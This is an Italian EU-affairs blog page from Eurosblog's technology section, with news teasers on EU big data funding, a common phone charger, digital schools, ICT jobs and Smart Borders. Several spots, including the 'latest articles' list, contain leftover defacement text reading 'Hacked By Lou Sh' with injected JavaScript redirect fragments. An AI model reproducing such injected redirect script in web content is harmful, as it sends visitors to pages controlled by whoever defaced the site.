EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Tecnologie

Tecnologie


Tecnologie

it

window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" Hacked By Lou Sh If you are not redirected automatically, follow the link to example

window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" Hacked By Lou Sh If you are not redirected automatically, follow the link to example

it

L’accordo stretto lo scorso 13 ottobre tra la Commissione e l’industria europea dei dati prevede un investimento di 2,5 miliardi di euro destinati alla gestione dei big data. In questo modo l’Europa potrà portarsi al pari degli altri Stati a livello mondiale. L’intesa sarà attiva a partire dal 1° gennaio 2015.

Investire nei megadati porterebbe alla creazione di circa 100.000 nuovi posti di lavoro entro il 2020 e potrebbe ridurre del 10% i consumi energetici in Europa, sviluppare l’assistenza sanitaria e avere a disposizione macchinari industriali più efficienti.

L’intesa in materia di megadati è (...)

it

In vista delle prossime elezioni europee del 22-25 maggio, il Parlamento europeo lancia la sua prima app per iPad e tablet Android scaricabile gratuitamente dal sito www.boxyourep.eu.

Allo scopo di coinvolgere i cittadini nella politica europea, l’applicazione contiene una serie di “scatole” organizzate per tema che permetteranno agli utenti sia di leggere come l’Aula di Strasburgo ha legiferato negli ultimi cinque anni, sia di conoscere i progetti del prossimo quinquennio su (...)

it

Lo scorso 13 marzo gli eurodeputati, contestualmente all’approvazione della normativa che riguarda i dispositivi radio, hanno sollecitato l’introduzione di un caricabatterie comune per tutti i cellulari europei. L’obiettivo è quello di limitare i costi, i problemi e gli sprechi legati all’utenza. In via informale, la proposta era già stata concordata con il Consiglio dei Ministri.

L’iniziativa di un caricabatterie universale non si focalizza solamente sui telefoni cellulari, ma anche su altri dispositivi come quelli radio, i telecomandi per aprire l’automobile e i modem. Questo per poter essere sempre aggiornati considerate la crescita smisurata e la varietà dei prodotti (...)

it

Quella in cui viviamo tutti i giorni è una società interconnessa, in cui sempre più persone, di qualunque fascia di età, si avvalgono dell’uso di tecnologie. Tuttavia, soprattutto per i più piccoli, è evidente come il mondo scolastico non rifletta esattamente questa realtà.

Nei paesi dell’UE oltre il 60% dei bambini frequentano scuole e istituti non ancora dotati di tecnologia digitale. La scuola non fornisce sistemi di lettura digitale, software di esercizi, simulazioni o giochi didattici. Soltanto la metà dei giovani di 16 anni frequenta ‘istituti digitalizzati’ e (...)

it

La Commissione europea ha scelto Roma come sede del nuovo evento, per mostrare come lo spazio e le sue applicazioni possano offrire vantaggi alla vita quotidiana di tutti i cittadini europei.

La possibilità che questo evento concede tanto ai cittadini, quanto agli studenti che si interessano all’astrofisica, è quella di scoprire i principali progetti spaziali che rievocano alla mente grandi nomi, quali Galileo, il programma europeo di navigazione satellitare, o Copernicus, il programma (...)

it

Dal 2006 ad oggi il numero dei computer a disposizione delle scuole è aumentato notevolmente: ciò permette da una parte di offrire ad esse la possibilità di collegarsi ma dall’altra avviene una fruizione molto irregolare di questi dispositivi.

Secondo lo studio pubblicato dalla Commissione Europea, nelle scuole dell’Ue gli insegnanti hanno bisogno di un valido supporto e delle competenze necessarie per poter affrontare ed essere all’altezza delle nuove tecnologie. I risultati parlano chiaro: in nove anni di studi solamente un ragazzo (...)

it

864.000 posti di lavoro in Europa entro i prossimi due anni. Secondo un recente studio di Empirica a tanto ammonterebbe il divario occupazionale nel settore digitale, che la Commissione UE si prepara a colmare con la “Grande Coalizione” con il settore privato

La crisi economica ha creato più di 26 milioni di disoccupati in Europa. Una cifra impressionante, ma ancor più impressionante è che nonostante tale situazione ogni anno aumenta di 100mila unità il numero di posti nel settore delle tecnologie dell’informazione e della comunicazione, difficili da (...)

it

Dato che il numero dei cittadini stranieri che si recano nei territori dell’Ue è in aumento, Bruxelles ha deciso di creare un sistema comune di registrazione elettronica lungo tutte le sue frontiere.

Le nuove tecnologie consentirebbero di semplificare la vita agli stranieri che si recano di frequente nell’Ue e monitorare meglio i cittadini di paesi terzi che attraversano le frontiere. Tramite un pacchetto di proposte legislative, chiamato “Smart Border”, la Commissione Europea interviene su (...)

it

Adottata nel 2010, l'Agenda digitale rientra nel progetto Europa 2020. E' una strategia messa a punto al fine di favorire l'utilizzo delle TIC (Tecnologie dell'informazione e della comunicazione), come strumento da applicare per risolvere problemi di natura sociale e con lo scopo di favorire l'economia digitale.

Le nuove 7 priorità

Nella conferenza stampa tenuta dalla Vice presidente Neelie Kroes, la Commissione ha proposto come primo urgente obiettivo quello di stabilire una legislazione solida che disciplini la banda larga per evitare discriminazioni in materia di accesso alle reti. Inoltre, ha (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France